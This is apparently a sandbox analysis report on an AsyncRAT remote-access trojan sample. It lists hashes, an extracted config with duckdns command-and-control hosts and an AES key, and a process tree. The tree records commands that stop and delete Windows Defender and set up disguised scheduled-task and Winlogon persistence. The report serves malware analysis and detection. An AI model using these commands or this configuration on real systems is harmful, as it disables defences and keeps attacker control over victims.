asyncrat | 866ac65940057d6e1a125eda23a12d6743d75e6ff3a74ff6d53debb3fe90a368

Resubmissions

21-01-2025 11:37

250121-nrfehs1pby 10

12-07-2021 19:05

210712-p4pm4lvw8x 10

Analysis

max time kernel
142s
max time network
180s
platform
windows7_x64
resource
win7v20210410
submitted
12-07-2021 19:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8a2abab20bf75ac19eaa73be3b09219d.exe
Size

455KB
MD5

8a2abab20bf75ac19eaa73be3b09219d
SHA1

c0fa652bb151644bf76b55f3c9d68cb5e8d7faf3
SHA256

866ac65940057d6e1a125eda23a12d6743d75e6ff3a74ff6d53debb3fe90a368
SHA512

e8842b9f47a5dce906ddca3dfbb608eba660c80364ed0b02b48c33e161df3e95226d713177733e7591cc7eccecb3f48e1a731576a90d6fbda194de98de5495c9

Score

10^/10

asyncrat link pdf persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

sbmsbm20.duckdns.org:2020

sbmsbm20.duckdns.org:3040

sbmsbm20.duckdns.org:4040

hpdndbnb.duckdns.org:2020

hpdndbnb.duckdns.org:3040

hpdndbnb.duckdns.org:4040

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
Lvyod3VuSZyfscnKiu0YIwvTV1TQp7CD
anti_detection
false
autorun
true
bdos
false
delay
Default
host
sbmsbm20.duckdns.org,hpdndbnb.duckdns.org
hwid
3
install_file
install_folder
%Temp%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
2020,3040,4040
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Local\\Adobe.exe\","	8a2abab20bf75ac19eaa73be3b09219d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Local\\Adobe.exe\","	Acrobat Reader.exe

Async RAT payload 5 IoCs

rat

resource	yara_rule
behavioral1/memory/2012-94-0x0000000000400000-0x0000000000418000-memory.dmp	asyncrat
behavioral1/memory/2012-95-0x000000000040C79E-mapping.dmp	asyncrat
behavioral1/memory/2012-96-0x0000000000400000-0x0000000000418000-memory.dmp	asyncrat
behavioral1/memory/1340-146-0x000000000040C79E-mapping.dmp	asyncrat
behavioral1/memory/1340-148-0x0000000000400000-0x0000000000418000-memory.dmp	asyncrat

Nirsoft 26 IoCs

resource	yara_rule
behavioral1/files/0x000500000000f6e0-73.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-76.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-74.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-78.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-79.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-80.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-82.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-84.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-85.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-87.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-89.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-90.dat	Nirsoft
behavioral1/files/0x000500000000f6e0-92.dat	Nirsoft
behavioral1/files/0x0004000000013100-125.dat	Nirsoft
behavioral1/files/0x0004000000013100-123.dat	Nirsoft
behavioral1/files/0x0004000000013100-122.dat	Nirsoft
behavioral1/files/0x0004000000013100-129.dat	Nirsoft
behavioral1/files/0x0004000000013100-128.dat	Nirsoft
behavioral1/files/0x0004000000013100-127.dat	Nirsoft
behavioral1/files/0x0004000000013100-131.dat	Nirsoft
behavioral1/files/0x0004000000013100-134.dat	Nirsoft
behavioral1/files/0x0004000000013100-133.dat	Nirsoft
behavioral1/files/0x0004000000013100-136.dat	Nirsoft
behavioral1/files/0x0004000000013100-138.dat	Nirsoft
behavioral1/files/0x0004000000013100-139.dat	Nirsoft
behavioral1/files/0x0004000000013100-141.dat	Nirsoft

Executes dropped EXE 10 IoCs

pid	Process
612	AdvancedRun.exe
436	AdvancedRun.exe
1564	AdvancedRun.exe
832	AdvancedRun.exe
780	Acrobat Reader.exe
1668	AdvancedRun.exe
1564	AdvancedRun.exe
2004	AdvancedRun.exe
1708	AdvancedRun.exe
1340	Acrobat Reader.exe

Loads dropped DLL 18 IoCs

pid	Process
1816	8a2abab20bf75ac19eaa73be3b09219d.exe
1816	8a2abab20bf75ac19eaa73be3b09219d.exe
612	AdvancedRun.exe
612	AdvancedRun.exe
1816	8a2abab20bf75ac19eaa73be3b09219d.exe
1816	8a2abab20bf75ac19eaa73be3b09219d.exe
1564	AdvancedRun.exe
1564	AdvancedRun.exe
1280	cmd.exe
780	Acrobat Reader.exe
780	Acrobat Reader.exe
1668	AdvancedRun.exe
1668	AdvancedRun.exe
780	Acrobat Reader.exe
780	Acrobat Reader.exe
2004	AdvancedRun.exe
2004	AdvancedRun.exe
780	Acrobat Reader.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1816 set thread context of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 780 set thread context of 1340	780	Acrobat Reader.exe	45

HTTP links in PDF interactive object 6 IoCs

Detects HTTP links in interactive objects within PDF files.

pdf link

resource	yara_rule
behavioral1/files/0x00040000000130fb-105.dat	pdf_with_link_action
behavioral1/files/0x00040000000130fb-106.dat	pdf_with_link_action
behavioral1/files/0x00040000000130fb-108.dat	pdf_with_link_action
behavioral1/files/0x000600000000f6e0-143.dat	pdf_with_link_action
behavioral1/files/0x00040000000130fb-144.dat	pdf_with_link_action
behavioral1/files/0x00040000000130fb-147.dat	pdf_with_link_action

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1644	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
592	timeout.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
612	AdvancedRun.exe
612	AdvancedRun.exe
436	AdvancedRun.exe
436	AdvancedRun.exe
1564	AdvancedRun.exe
1564	AdvancedRun.exe
832	AdvancedRun.exe
832	AdvancedRun.exe
1816	8a2abab20bf75ac19eaa73be3b09219d.exe
1816	8a2abab20bf75ac19eaa73be3b09219d.exe
2012	8a2abab20bf75ac19eaa73be3b09219d.exe
1668	AdvancedRun.exe
1668	AdvancedRun.exe
1564	AdvancedRun.exe
1564	AdvancedRun.exe
2004	AdvancedRun.exe
2004	AdvancedRun.exe
1708	AdvancedRun.exe
1708	AdvancedRun.exe
780	Acrobat Reader.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	1816	8a2abab20bf75ac19eaa73be3b09219d.exe
Token: SeDebugPrivilege	612	AdvancedRun.exe
Token: SeImpersonatePrivilege	612	AdvancedRun.exe
Token: SeDebugPrivilege	436	AdvancedRun.exe
Token: SeImpersonatePrivilege	436	AdvancedRun.exe
Token: SeDebugPrivilege	1564	AdvancedRun.exe
Token: SeImpersonatePrivilege	1564	AdvancedRun.exe
Token: SeDebugPrivilege	832	AdvancedRun.exe
Token: SeImpersonatePrivilege	832	AdvancedRun.exe
Token: SeDebugPrivilege	2012	8a2abab20bf75ac19eaa73be3b09219d.exe
Token: SeDebugPrivilege	780	Acrobat Reader.exe
Token: SeDebugPrivilege	1668	AdvancedRun.exe
Token: SeImpersonatePrivilege	1668	AdvancedRun.exe
Token: SeDebugPrivilege	1564	AdvancedRun.exe
Token: SeImpersonatePrivilege	1564	AdvancedRun.exe
Token: SeDebugPrivilege	2004	AdvancedRun.exe
Token: SeImpersonatePrivilege	2004	AdvancedRun.exe
Token: SeDebugPrivilege	1708	AdvancedRun.exe
Token: SeImpersonatePrivilege	1708	AdvancedRun.exe
Token: SeDebugPrivilege	1340	Acrobat Reader.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1816 wrote to memory of 612	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	29
PID 1816 wrote to memory of 612	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	29
PID 1816 wrote to memory of 612	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	29
PID 1816 wrote to memory of 612	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	29
PID 612 wrote to memory of 436	612	AdvancedRun.exe	30
PID 612 wrote to memory of 436	612	AdvancedRun.exe	30
PID 612 wrote to memory of 436	612	AdvancedRun.exe	30
PID 612 wrote to memory of 436	612	AdvancedRun.exe	30
PID 1816 wrote to memory of 1564	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	31
PID 1816 wrote to memory of 1564	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	31
PID 1816 wrote to memory of 1564	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	31
PID 1816 wrote to memory of 1564	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	31
PID 1564 wrote to memory of 832	1564	AdvancedRun.exe	32
PID 1564 wrote to memory of 832	1564	AdvancedRun.exe	32
PID 1564 wrote to memory of 832	1564	AdvancedRun.exe	32
PID 1564 wrote to memory of 832	1564	AdvancedRun.exe	32
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 1816 wrote to memory of 2012	1816	8a2abab20bf75ac19eaa73be3b09219d.exe	33
PID 2012 wrote to memory of 1988	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	34
PID 2012 wrote to memory of 1988	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	34
PID 2012 wrote to memory of 1988	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	34
PID 2012 wrote to memory of 1988	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	34
PID 2012 wrote to memory of 1280	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	36
PID 2012 wrote to memory of 1280	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	36
PID 2012 wrote to memory of 1280	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	36
PID 2012 wrote to memory of 1280	2012	8a2abab20bf75ac19eaa73be3b09219d.exe	36
PID 1988 wrote to memory of 1644	1988	cmd.exe	38
PID 1988 wrote to memory of 1644	1988	cmd.exe	38
PID 1988 wrote to memory of 1644	1988	cmd.exe	38
PID 1988 wrote to memory of 1644	1988	cmd.exe	38
PID 1280 wrote to memory of 592	1280	cmd.exe	39
PID 1280 wrote to memory of 592	1280	cmd.exe	39
PID 1280 wrote to memory of 592	1280	cmd.exe	39
PID 1280 wrote to memory of 592	1280	cmd.exe	39
PID 1280 wrote to memory of 780	1280	cmd.exe	40
PID 1280 wrote to memory of 780	1280	cmd.exe	40
PID 1280 wrote to memory of 780	1280	cmd.exe	40
PID 1280 wrote to memory of 780	1280	cmd.exe	40
PID 780 wrote to memory of 1668	780	Acrobat Reader.exe	41
PID 780 wrote to memory of 1668	780	Acrobat Reader.exe	41
PID 780 wrote to memory of 1668	780	Acrobat Reader.exe	41
PID 780 wrote to memory of 1668	780	Acrobat Reader.exe	41
PID 1668 wrote to memory of 1564	1668	AdvancedRun.exe	42
PID 1668 wrote to memory of 1564	1668	AdvancedRun.exe	42
PID 1668 wrote to memory of 1564	1668	AdvancedRun.exe	42
PID 1668 wrote to memory of 1564	1668	AdvancedRun.exe	42
PID 780 wrote to memory of 2004	780	Acrobat Reader.exe	43
PID 780 wrote to memory of 2004	780	Acrobat Reader.exe	43
PID 780 wrote to memory of 2004	780	Acrobat Reader.exe	43
PID 780 wrote to memory of 2004	780	Acrobat Reader.exe	43
PID 2004 wrote to memory of 1708	2004	AdvancedRun.exe	44
PID 2004 wrote to memory of 1708	2004	AdvancedRun.exe	44
PID 2004 wrote to memory of 1708	2004	AdvancedRun.exe	44
PID 2004 wrote to memory of 1708	2004	AdvancedRun.exe	44
PID 780 wrote to memory of 1340	780	Acrobat Reader.exe	45
PID 780 wrote to memory of 1340	780	Acrobat Reader.exe	45
PID 780 wrote to memory of 1340	780	Acrobat Reader.exe	45

C:\Users\Admin\AppData\Local\Temp\8a2abab20bf75ac19eaa73be3b09219d.exe
"C:\Users\Admin\AppData\Local\Temp\8a2abab20bf75ac19eaa73be3b09219d.exe"
1⤵
- Modifies WinLogon for persistence
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816
- C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:612
- - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 612
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:436
- C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 1564
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- C:\Users\Admin\AppData\Local\Temp\8a2abab20bf75ac19eaa73be3b09219d.exe
  C:\Users\Admin\AppData\Local\Temp\8a2abab20bf75ac19eaa73be3b09219d.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Acrobat Reader" /tr '"C:\Users\Admin\AppData\Local\Temp\Acrobat Reader.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Acrobat Reader" /tr '"C:\Users\Admin\AppData\Local\Temp\Acrobat Reader.exe"'
      4⤵
      Creates scheduled task(s)
      PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBB1.tmp.bat""
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:592
  - - C:\Users\Admin\AppData\Local\Temp\Acrobat Reader.exe
      "C:\Users\Admin\AppData\Local\Temp\Acrobat Reader.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:780
    - - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1668
      - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 1668
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1564
    - - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2004
      - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 2004
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
    - - C:\Users\Admin\AppData\Local\Temp\Acrobat Reader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Acrobat Reader.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/612-77-0x0000000075EF1000-0x0000000075EF3000-memory.dmp

Filesize
8KB

Download
memory/780-109-0x0000000001060000-0x0000000001061000-memory.dmp

Filesize
4KB

Download
memory/780-111-0x0000000000530000-0x0000000000531000-memory.dmp

Filesize
4KB

Download
memory/1340-151-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/1340-148-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1816-68-0x0000000005D50000-0x0000000005DB9000-memory.dmp

Filesize
420KB

Download
memory/1816-60-0x00000000010E0000-0x00000000010E1000-memory.dmp

Filesize
4KB

Download
memory/1816-63-0x0000000000990000-0x00000000009D3000-memory.dmp

Filesize
268KB

Download
memory/1816-62-0x0000000004BB0000-0x0000000004BB1000-memory.dmp

Filesize
4KB

Download
memory/2012-94-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2012-96-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2012-99-0x0000000000E80000-0x0000000000E81000-memory.dmp

Filesize
4KB

Download